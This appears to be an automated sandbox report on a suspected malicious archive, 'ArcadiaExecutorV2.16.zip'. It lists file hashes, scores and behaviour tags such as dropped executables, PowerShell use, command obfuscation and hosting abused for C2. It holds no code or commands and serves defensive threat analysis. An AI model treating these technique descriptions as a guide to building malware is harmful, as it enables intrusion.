General

  • Target

    ArcadiaExecutorV2.16.zip

  • Size

    24.3MB

  • Sample

    250208-gz328aznax

  • MD5

    8847dcc1b069b580fc0fdee388369207

  • SHA1

    18406d7dabf3ab2a799d05afe5b984d75d22e920

  • SHA256

    989cf739672494aea2a6a64f8639f23c8ca7708cf6f7efae29baa545cf4375b0

  • SHA512

    2258364b3b2752c2c1400c5f30b31de223d10b5edb8c50fee523bba5906cb6cd56900dffe533df724285f52ef861e656d9451e6745578f9fb0db198af11c38cc

  • SSDEEP

    786432:zr51UrODy9A2tELumTzdA3I2nkJJXXH37rNiBh/S:X51UuktES8zdcn4JHX7rNiX/S

Malware Config

Targets

    • Target

      ArcadiaExecutorV2.16.zip

    • Size

      24.3MB

    • MD5

      8847dcc1b069b580fc0fdee388369207

    • SHA1

      18406d7dabf3ab2a799d05afe5b984d75d22e920

    • SHA256

      989cf739672494aea2a6a64f8639f23c8ca7708cf6f7efae29baa545cf4375b0

    • SHA512

      2258364b3b2752c2c1400c5f30b31de223d10b5edb8c50fee523bba5906cb6cd56900dffe533df724285f52ef861e656d9451e6745578f9fb0db198af11c38cc

    • SSDEEP

      786432:zr51UrODy9A2tELumTzdA3I2nkJJXXH37rNiBh/S:X51UuktES8zdcn4JHX7rNiX/S

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/ArcadiaModule.dll

    • Size

      1.3MB

    • MD5

      7ba33b5fbfd4662d72b50bb09bde7ed7

    • SHA1

      d26998c60811161ec2130d8566029bf0648fa990

    • SHA256

      ec1e6529a83db97684474c1cb4e0a989eb7bcfea98591afc2c026b08f48600a0

    • SHA512

      4626bf8721675e0b0063df5e677b06616db08cdb71f5026263167179dee32faf2a87881e8031a1359ed828ff9e090c1ee29829bb43f3cd043c2b19071aa7c316

    • SSDEEP

      24576:x8Op+ZPe0AI/Ip+Tof6nHuFPZ7sYgdlTa/7oW/dGy/KmlQ82VHP3JYgprP5//pAV:x1p+ZPe0AI/Ip+Tof6nHuFPZ7sYgdlTd

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/ArcadiaUI.exe

    • Size

      51.2MB

    • MD5

      5b9ba4ee7343aaaa7cd1d07c65b36c67

    • SHA1

      4563992458d1addf52aaf1b80f143834b4d3f4c6

    • SHA256

      f443cd3d5e00ca7db2000c383d0361a39f63c106965f7a4fe6498ba69b9de25a

    • SHA512

      43a8fec1d78600d5e4da4745ccda5bd551a75b610c2eb08209c96a6c99a80c0a877807fabdda09c6b17379011cff946487028e3f2613f5d42819ac8e87f2112e

    • SSDEEP

      393216:3t4stWJi9Ui9MA8VFJs+SBZ0RJ2DJ/MxDA6RBgPOdF3aYAubKnvJoKlQnAliXUxg:3trtWJi9Ui9MA8VFoBZ0RMUNtKxwi99Q

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Legitimate hosting services abused for malware hosting/C2

    • Obfuscated Files or Information: Command Obfuscation

      Adversaries may obfuscate content during command execution to impede detection.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

    • Target

      ArcadiaFolder/Vulkan-1.dll

    • Size

      876KB

    • MD5

      6d6a1f28978d42ad2f0a8f278eaac966

    • SHA1

      b09168ec88109422ca29cf4f1b6462d51930873d

    • SHA256

      fb23fa4fca8f28bebe7b7e39593a211cd3c3405de5f948ec520e859b1bcaf91e

    • SHA512

      76ddf88255a9355fc3c781880e23d94206acca4decf5623712411f7a733e91ca9ea37944860401cf9667f10e8c33a087803a4726f91faff1f23e3e0592ddf41d

    • SSDEEP

      12288:bXlW6JhG2lO8FbG5byJR//uXShuqO3daKScHj/mTnGS:bE6JY2sYS5GJRuHkcHqTnGS

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/d3compiler.dll

    • Size

      492KB

    • MD5

      5e02ddaf3b02e43e532fc6a52b04d14b

    • SHA1

      67f0bd5cfa3824860626b6b3fff37dc89e305cec

    • SHA256

      78bedd9fce877a71a8d8ff9a813662d8248361e46705c4ef7afc61d440ff2eeb

    • SHA512

      38720cacbb169dfc448deef86af973eafefa19eaeb48c55c58091c9d6a8b12a1f90148c287faaaa01326ec47143969ad1b54ee2b81018e1de0b83350dc418d1c

    • SSDEEP

      12288:axrplPT3qwNBC3wl1zVh0Yg0pJy/qleTpfZLQ0so/VHjh:a1plPGwNBC3UOwVeLQ0so/VH

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/directory.cpp

    • Size

      681B

    • MD5

      6340241283dc43e2cd4f941c6ecb58c5

    • SHA1

      989ca161b8e13f3ca2c5bdab49b399fe9b3805a6

    • SHA256

      ba2635c702e94b5fc489d4fc6f0cdeb72decc8545e7fc3e9654f1e64004e5cc4

    • SHA512

      f996ad25f455a57ece913be0cf37f40b2530c00b12c1bbfdb250e1731372d08f27b94d2692f1195e529f420add42b46e82d19eab77d3bc963531b5eb72f89dc9

    Score
    3/10
    • Target

      ArcadiaFolder/libEGL.dll

    • Size

      771KB

    • MD5

      fa842ffa299c794e57597aae857d9cb3

    • SHA1

      154afdfd9bd80c1b512f516a8c187c6dd849161e

    • SHA256

      b1d4cdc7891d51636c5e82a91b9bf20e6bb6e68ddf515ac6f51fbda7b199d07d

    • SHA512

      04ee2bff2a9ff0cf89150bb73f0f6a0bda372a245f12c5772b7167821f54f3d1d43292e3ce3c9f2eca2202688c179d5f09248c0fe522bf028c221e07b2d34e4a

    • SSDEEP

      12288:p19qiYOqG2pYOhcX6j1J5uKxXsE2sMCna5hvD52fcH6p:v9qib2FjxussE2hCyScH6p

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/main.cpp

    • Size

      1KB

    • MD5

      767c8b02d63f83e7e31a4b7a27f40405

    • SHA1

      82de700102b79ad782ad6e64353eb64704a54ad4

    • SHA256

      43f1c36b2cd6d5566b41dd1f97359bc7a0d17c769bd8ebdd0370ca03755b04ed

    • SHA512

      303186c4cc8a1c28779dc9738c43144ba6055aec0bf3d0544402a04c04f18a9830b6f04e774d84c8cd6e0643d45d30b19e87770bd2ed273be324bfef8aeaf22b

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/vk_swiftshader.dll

    • Size

      952KB

    • MD5

      8836edb783ce89ca6481c297772325bc

    • SHA1

      6968c977f594930543ec296ad00322e998129a6a

    • SHA256

      cfa1993c3e7272b3aee610634592c26beaf8e573ac9d3c59695e35a5d2372b17

    • SHA512

      34f07f52e43296e0b3e084857270a8375faf50e2b6cd9522a572efb90de38a3f27b9727861e0258149ed13bd96e114175c9d1d237b0ef97ad4fa53e119ce7f36

    • SSDEEP

      12288:ZjeSIgE+K5HzlwsHTQwEKaAn9BRWTCbsIgbEpzre+TZjGAfR4J:Zjvs+K5HTJaAn9Bw+rgopWa/uJ

    Score
    1/10
    • Target

      ArcadiaFolder/vk_swiftshader_icd.json

    • Size

      977B

    • MD5

      644dfd86b641a7289f560f128e12798f

    • SHA1

      250e9a4b428aa7dd5fe753b815230c78704d0853

    • SHA256

      9cc489a1f2b80cdc9d748230cf905a8025a17cbade077ee42ed81fc1f874aac2

    • SHA512

      735da46d0f3d33d0e5f55c6fb671d45d845a538cff498ca04e3ae86f8412d06ee6a3d3f5d2774d8d9eb06ddd854f479b7a29ea272c589164f11cd107f141b1b8

    Score
    8/10
    • Downloads MZ/PE file

MITRE ATT&CK Enterprise v15

Tasks